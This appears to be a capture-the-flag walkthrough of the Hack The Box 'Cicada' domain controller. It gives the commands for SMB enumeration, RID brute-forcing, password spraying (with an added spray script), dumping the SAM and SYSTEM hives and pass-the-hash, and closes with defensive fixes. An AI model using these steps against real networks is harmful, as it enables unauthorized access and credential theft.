Cicada HTB Walkthrough
Step 1: Initial Enumeration with Nmap
The first step against Cicada is an Nmap scan to identify open ports and the services behind them (version detection, default scripts, all output formats saved under nmap/):
sudo nmap -sV -sC -oA nmap/cicada 10.10.11.35
Nmap Results
The scan revealed several open ports, including:
- DNS (53)
- Kerberos (88)
- MSRPC (135, 593)
- LDAP and LDAPS, including the Global Catalog ports (389, 636, 3268, 3269)
- SMB (445)
Kerberos, LDAP and SMB on a single host is the signature of an Active Directory domain controller, so the attack surface to focus on is SMB, Kerberos and LDAP.
Step 2: Enumerating SMB Shares
Next, list the shares reachable over a null session (-N means no password):
smbclient -N -L //10.10.11.35
Discovered shares:
- ADMIN$
- C$
- DEV
- HR
- NETLOGON
- SYSVOL
ADMIN$, C$, NETLOGON and SYSVOL are standard on a domain controller; DEV and HR are custom shares and the first thing to check.
Step 3: Downloading HR Notices
Attempt to access the HR share without authentication (press Enter at the password prompt):
smbclient //10.10.11.35/HR -U ""
get "Notice from HR.txt"
Inspecting the file:
cat Notice\ from\ HR.txt
The notice hands out a default password for new employees:
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
Step 4: Enumerate Users with SMB
Use NetExec (nxc) to brute-force RIDs over the unauthenticated session; the SidTypeUser entries in the output are the domain accounts, and they are saved as user.txt for the next step:
nxc smb 10.10.11.35 -u '.' -p "" --rid-brute
Step 5: Password Spraying with CME
Use CrackMapExec (CME; nxc accepts the same syntax) to spray the default password across the user list. This is a single password per account, so it stays well below any sane lockout threshold:
cme smb 10.10.11.35 -u user.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
Success: the default password is still valid for the user michael.wrightson.
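Steps 4 and 5 are usually glued together by hand. The script below is an added example and is not part of the original walkthrough: it turns rid-brute output into a clean username list (SidTypeUser entries only, domain prefix stripped, machine accounts ending in $ dropped) and sprays one password over it with nxc. The rid-brute lines are constructed to match the tool's output layout, and the RIDs in them are illustrative; TARGET, PASSWORD and USERLIST are environment variables assumed for this example.

```shell
#!/usr/bin/env bash
# Added example (not from the original walkthrough): rid-brute output -> user list -> spray.
set -eu

# Constructed sample of `nxc smb <target> -u ... --rid-brute` output. The field
# layout matches the tool; the RIDs are illustrative only.
SAMPLE_RID_BRUTE='SMB  10.10.11.35  445  CICADA-DC  500: CICADA\Administrator (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  501: CICADA\Guest (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  512: CICADA\Domain Admins (SidTypeGroup)
SMB  10.10.11.35  445  CICADA-DC  1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1105: CICADA\michael.wrightson (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1106: CICADA\david.orelious (SidTypeUser)
SMB  10.10.11.35  445  CICADA-DC  1601: CICADA\emily.oscars (SidTypeUser)'

# extract_users: rid-brute output on stdin -> one bare username per line.
# Keeps only SidTypeUser rows, drops machine accounts (name ends in $),
# strips the DOMAIN\ prefix and de-duplicates.
extract_users() {
    grep 'SidTypeUser' \
        | grep -v '\$ (SidTypeUser)' \
        | sed -E 's/.*\\([^ ]+) \(SidTypeUser\).*/\1/' \
        | sort -u
}

# build_userlist <rid-brute-output-file> <out-file>
build_userlist() {
    extract_users < "$1" > "$2"
}

# spray <target> <userlist-file> <password>
# --continue-on-success keeps spraying after the first hit, so every account
# that still has the default password is reported, not just the first one.
spray() {
    nxc smb "$1" -u "$2" -p "$3" --continue-on-success
}

# Stand-alone run: write the user list from the constructed sample, then spray
# only when a target is supplied, e.g.
#   TARGET=10.10.11.35 PASSWORD='Cicada$M6Corpb*@Lp#nZp!8' ./spray.sh
USERLIST="${USERLIST:-user.txt}"
printf '%s\n' "$SAMPLE_RID_BRUTE" | extract_users > "$USERLIST"
if [ -n "${TARGET:-}" ]; then
    spray "$TARGET" "$USERLIST" "${PASSWORD:?set PASSWORD}"
fi
```

On a real run, capture the rid-brute output to a file first (nxc smb 10.10.11.35 -u '.' -p '' --rid-brute > rids.txt) and call build_userlist rids.txt user.txt; the parsing is the same.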
Step 6: Extracting User Descriptions
With a valid domain account, CrackMapExec's --users lists every domain user together with the description attribute, which is readable by any authenticated user and is a common place for leaked secrets:
crackmapexec smb 10.10.11.35 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
One description contains another user's password in clear text:
cicada.htb\david.orelious : Just in case I forget my password is aRt$Lp#7t*VQ!3
Step 7: Accessing the DEV Share
Use David's credentials (user%password form) to explore the DEV share, which was not readable anonymously:
smbclient //10.10.11.35/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
smb: \> dir
smb: \> get backup_script.ps1
Step 8: Gaining a PowerShell Shell
The backup script contains hard-coded credentials for emily.oscars. Use Evil-WinRM (WinRM on port 5985 must be reachable) to get a shell as that user:
evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35
Inside the shell, navigate to the desktop and read user.txt:
cd C:\Users\emily.oscars\Desktop
cat user.txt
Step 9: Extracting SYSTEM & SAM Files
To escalate privileges, save the SAM and SYSTEM registry hives to disk. Saving these hives normally requires SeBackupPrivilege (Backup Operators) or administrative rights, so confirm with whoami /priv before trying; the account used here has the necessary rights:
reg save hklm\sam sam
reg save hklm\system system
Download both files to the attacking machine with Evil-WinRM's download command before the next step.
Step 10: Dumping Admin Hash
Use impacket-secretsdump to extract the local account hashes from the offline hives (the LOCAL keyword tells it to parse the files rather than connect to a target):
impacket-secretsdump -sam sam -system system local
The output contains one line per local account in the form user:RID:LMhash:NThash:::; the NT hash from the Administrator line is what is needed next.
Step 11: Logging in as Administrator
Pass the hash with Evil-WinRM (-H takes the NT hash; no password is needed):
evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i 10.10.11.35
Once inside, read root.txt:
cd C:\Users\Administrator\Desktop
cat root.txt
Conclusion
By combining SMB enumeration, password spraying and privilege escalation, we compromised the Cicada box and obtained both the user and root flags. Every link in the chain was a stored secret: a default password posted on an anonymously readable share, a password kept in an AD user description, credentials hard-coded in a backup script, and an account allowed to back up the SAM and SYSTEM hives. The fixes follow directly: no anonymous or guest access to shares, no passwords in description attributes or scripts, forced password changes on first logon, tight membership of privileged groups such as Backup Operators, and monitoring of Active Directory for spraying and unusual hive access.